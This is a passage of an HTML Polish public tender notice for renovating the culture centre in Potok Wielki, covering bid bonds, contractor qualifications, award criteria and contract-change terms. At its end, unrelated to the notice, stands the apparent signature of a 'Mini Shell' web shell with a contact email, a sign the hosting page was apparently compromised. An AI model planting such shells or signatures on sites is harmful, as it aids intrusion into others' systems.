71 9410 1049 2005 5000 0329 0003 BS Janów Lubelski Oddział Potok Wielki z adnotacją wadium - Remont wraz z wyposażeniem Gminnego Ośrodka Kultury w Potoku Wielkim.  
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie 2014-04-14, sposób przekazania: w przypadku wniesienia wadium w formie innej niż pieniądz - oryginał lub kserokopię dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Gmina Potok Wielki, Potok Wielki 117, 23-313 Potok Wielki w sekretariacie lub dołączyć do oferty
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
BS Janów Lubelski Oddział Potok Wielki nr rachunku: 71 9410 1049 2005 5000 0329 0003 z adnotacją: wadium - Remont wraz z wyposażeniem Gminnego Ośrodka Kultury w Potoku Wielkim. 
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji, co najmniej 1 roboty budowlanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną robotę budowlaną o wartości min. 500 000 zł brutto i polegającą na budowie, przebudowie, rozbudowie, modernizacji lub remoncie budynku, z podaniem jej wartości oraz daty i miejsca wykonania wraz z dowodami potwierdzającymi, że robota ta została wykonana w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę -Wykonawca musi dysponować w celu wykonania zamówienia osobami odpowiedzialnymi za kierowanie robotami budowlanymi w specjalności:
- min. 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej 
- min. 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
lub przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia osób posiadających wymagane uprawnienia, zdolnych do wykonania zamówienia.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, w/w warunek mogą oni spełniać łącznie. 
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę minimum 500 000 zł. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 500 000 zł.  
Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 500 000 zł.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy, 2) Formularz cenowy, 3) Wykaz osób do kontaktów z Zamawiającym, 4) Oświadczenie o podwykonawstwie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy, Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy.
2.	Zamawiający przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	zmiana zakresu zamówienia spowodowana zmianą dokumentacji technicznej, skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego,
2)	zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzeń, gdy  wykorzystanie  materiałów   budowlanych,   sprzętu,   urządzeń   wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,
3)	zmiana stawki i  kwoty  podatku  VAT  oraz  wynagrodzenia  brutto  określonego w § 6 ust. 1 umowy,
4)	zmiana terminu realizacji przedmiotu zamówienia w przypadku:
a)	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b)	działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,
c)	zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, fakt ten musi być potwierdzony pisemnie przez Zamawiającego,
d)	realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
e)	błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie,
f)	konieczności	uzyskania	decyzji	lub	uzgodnień, mogących spowodować wstrzymanie robót,
g)	konieczność wykonania dodatkowych badań i ekspertyz.
5)	zmiana albo rezygnacja z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.
3.	Zmiany umowy przewidziane w  ust. 2 dopuszczalne są na następujących warunkach:
 ad pkt 1) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu
Zamawiającego;
ad pkt 2) - zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększeniem bezpieczeństwa na budowie pod warunkiem nie zwiększania ceny;
ad pkt 3) - stawka i kwota podatku VAT ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę. Jeżeli zmiana ta powodować będzie zmianę kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę;

ad pkt 4)
lit. a) - o czas umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego, lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego
działania,
lit. c) - o czas trwania niesprzyjających warunków atmosferycznych lub czas spełnienia wymogów technologicznych,
lit. d) - o czas niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy,
lit. e) - o czas niezbędny do naniesienia przez projektanta poprawek lub zmian w projekcie,
lit .f) - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień, lit. g) - o czas niezbędny do wykonania dodatkowych ekspertyz i badań,

ad pkt. 5) - Wykonawca jest obowiązany wykazać  Zamawiającemu,  iż  proponowany inny podwykonawca lub Wykonawca samodzielnie  spełnia  warunki udziału w  postępowaniu,  o  których  mowa  w  art.  22  ust.  1  ustawy w	stopniu   nie   mniejszym   niż   wymagany   w   trakcie   postępowania o udzielenie zamówienia.
4.	Zmiana postanowień  zawartej  umowy  może  nastąpić  wyłącznie  za  zgodą  obu  stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugpotokwielki.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Potok Wielki, Potok Wielki 117
23-313 Potok Wielki
pok. 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 09:00, miejsce: Urząd Gminy Potok Wielki, Potok Wielki 117
23-313 Potok Wielki
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 13.05.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rolnego w ramach działania: 413 Wdrażanie lokalnych strategii rozwoju - Odnowa i rozwój wsi, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com